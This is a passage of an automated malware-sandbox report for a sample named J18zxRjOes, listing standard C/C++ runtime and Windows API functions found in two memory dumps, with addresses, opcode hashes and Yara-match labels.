GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 00654AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00654ACD

Part of subcall function 00654D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00654800), ref: 00654DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00654AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00654AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 00654AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 00654B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00654BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 00654BC3

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 25e24886fc63b25ab9c0f9d4d58bd789f43e3affa12ac19f8583181b7268e5ad
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: C931E635A002159BCF44EF68C881AADB3BAFF44315F2045A9ED15AB345DF70EE49C794

Function 0066FBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: 4cab9259f6be8e4a80e3190a5d4c5f3bcd1505db804475aeaedacf2631e4d82d
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: 6D11E632505119BFDB242F76EC499AB7AAEEF86B61B100739FC15C7340DA318901D6B4

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 0066A5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0066A331: _free.LIBCMT ref: 0066A35A

_free.LIBCMT ref: 0066A638

Part of subcall function 006636D1: HeapFree.KERNEL32(00000000,00000000,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?), ref: 006636E7
Part of subcall function 006636D1: GetLastError.KERNEL32(?,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?,?), ref: 006636F9

_free.LIBCMT ref: 0066A643
_free.LIBCMT ref: 0066A64E
_free.LIBCMT ref: 0066A6A2
_free.LIBCMT ref: 0066A6AD
_free.LIBCMT ref: 0066A6B8
_free.LIBCMT ref: 0066A6C3

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 21e2f29053d176bfb8af0b4ffdc3ca98fb55272cdbf3c485a2f7ea06e93ef882
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 74114F71644B94BADDA0B7B1CC47FCB779EDF00700F40082DB2D9FA352DA65B9144A69

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 00642659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00640DA0,?,?,?,00000000), ref: 00642667
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00640DA0,?,?,?,00000000), ref: 0064266D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00640DA0,?,?,?,00000000), ref: 0064269A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00640DA0,?,?,?,00000000), ref: 006426A4
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00640DA0,?,?,?,00000000), ref: 006426B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006426CC
__CxxThrowException@8.LIBVCRUNTIME ref: 006426DA

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: 985d79a325e82a9c918b9f9a80d34f2510eb84f0a90a8243f152eb685f40d04a
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: 2701F734600116ABDB20BF61EC59FEF3B6AAF42B52FB10529F405D3161DB24D90486AC

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 006424A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0064670B), ref: 006424B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 006424C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 006424D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0064670B), ref: 00642500
GetProcAddress.KERNEL32(00000000), ref: 00642507
GetLastError.KERNEL32(?,?,?,0064670B), ref: 00642522
GetLastError.KERNEL32(?,?,?,0064670B), ref: 0064252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00642544
__CxxThrowException@8.LIBVCRUNTIME ref: 00642552

Strings

kernel32.dll, xrefs: 006424B0, 006424B5, 006424FA

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: 892dfcbb23e60c137e73d3ddfb5f080373293be48c05419b589e2fc31d59f410
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: C6F0D6759003113FA7113B757C5A85B3FADDA46B22360062AF801E2292EE348941856C

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

F(@, xrefs: 0040C651
F(@, xrefs: 0040C61B
ios_base::eofbit set, xrefs: 0040C649
ios_base::badbit set, xrefs: 0040C63A, 0040C65A
ios_base::failbit set, xrefs: 0040C644

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00661991 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006619AF

Part of subcall function 006636D1: HeapFree.KERNEL32(00000000,00000000,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?), ref: 006636E7
Part of subcall function 006636D1: GetLastError.KERNEL32(?,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?,?), ref: 006636F9

_free.LIBCMT ref: 006619C1
_free.LIBCMT ref: 006619D4
_free.LIBCMT ref: 006619E5
_free.LIBCMT ref: 006619F6

Strings

[o, xrefs: 00661991, 006619A0, 006619AE, 006619B5

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: [o
API String ID: 776569668-1129211812
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 29a3a62a4956c017a2488b850e773cc315c6235ccd9212f46ce4de47bd63d4e8
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: C0F03070D00320AB9EA16F14EC814053B62AF19722714026AF402D77B3C774D962DB8E

Function 0043172A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Strings

[o, xrefs: 0043172A, 00431739, 0043174E

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: [o
API String ID: 776569668-1129211812
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 0066239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,006625EC,00000001,00000001,?), ref: 006623F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006625EC,00000001,00000001,?,?,?,?), ref: 0066247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00662575
__freea.LIBCMT ref: 00662582

Part of subcall function 0066390E: RtlAllocateHeap.NTDLL(00000000,0063DAD7,00000000), ref: 00663940

__freea.LIBCMT ref: 0066258B
__freea.LIBCMT ref: 006625B0

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: 356149086004f3217569cdc997a5c47c3a26f77af21db79dd6880c3dd78c4943
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: 9751E172A10A27ABDB358F64CC61EEE77ABEB44750F154628FC06D6250EB78DC40C6A0

Function 0065E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0065E445
__cftoe.LIBCMT ref: 0065E477

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: 4f932debccea9646617655c2205730a25c83f812f082b4cf60d4925bad9c26bb
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: FC51FC32900205ABDF689B58CC41AEE77EBAF44376F10426DFC15D2282FB33DB058668

Function 0065302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00653051

Part of subcall function 00648AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00648ABD

SafeSQueue.LIBCONCRT ref: 0065306A
Concurrency::location::_Assign.LIBCMT ref: 0065312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0065314B
__CxxThrowException@8.LIBVCRUNTIME ref: 00653159

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: 1b6a5bfc2c875a707b1a3aeb524ebf3f54c883f1c348709afa2c2fbc6ea21a19
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 0431C2316007229FCB65AF64C845AAAB7A2EF44B51F14455DEC068B392DB70EA49CBC4

Function 00658F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00658F77
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00658F90
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00658F97
PMDtoOffset.LIBCMT ref: 00658FB6

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction ID: bc83e14d83f1b8f3d2741b414ff12af61ef25b180dc6a9734f3b9e579bce2917
Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction Fuzzy Hash: 432129726042049FDF14DF64DC46EAE77A7EB48792F20421EFD00B3A81DF31E9098695

Function 00635437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0063544B
__Mtx_init.LIBCPMT ref: 00635471
std::_Cnd_initX.LIBCPMT ref: 00635494
__Thrd_start.LIBCPMT ref: 006354B9
std::_Cnd_waitX.LIBCPMT ref: 006354D9
std::_Cnd_initX.LIBCPMT ref: 00635506

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 8df4ea97b5c2b464a1a643e18fd10c9daa4a7d7f11c61b86b3079ba0f76b37cd
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: 75217171C04208AADF55EBB8E845BDDB7FAAF09315F24402EF500B7242DB759A4487A9

Function 00659041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00659038,006569C9,00670907,00000008,00670C6C,?,?,?,?,00653CB2,?,?,0045A064), ref: 0065904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0065905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00659076
SetLastError.KERNEL32(00000000,?,00659038,006569C9,00670907,00000008,00670C6C,?,?,?,?,00653CB2,?,?,0045A064), ref: 006590C8

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 840b5288007eca2cd80498c8b8da2ff53530a76684962d83db4ccb69b39d7e33
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 7D012832209711AEAA6827F4AC8A9AB2747DB01777F34073DFC20413E1EF128C1959B9

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,363535E7), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,363535E7), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 00634FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00634FCA
int.LIBCPMT ref: 00634FE1

Part of subcall function 0063BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0063BFD4
Part of subcall function 0063BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0063BFEE

std::locale::_Getfacet.LIBCPMT ref: 00634FEA
std::_Facet_Register.LIBCPMT ref: 0063501B
std::_Lockit::~_Lockit.LIBCPMT ref: 00635031
__CxxThrowException@8.LIBVCRUNTIME ref: 0063504F

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: b237967f5e2947258df280973a3cfd3dcc9f81e5e0a495383b0a8ca328612e98
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: 1411A031D002189BCB65EB64C801AEE77B2AF04310F54011DF412BB2D2DB759E05CBD8

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

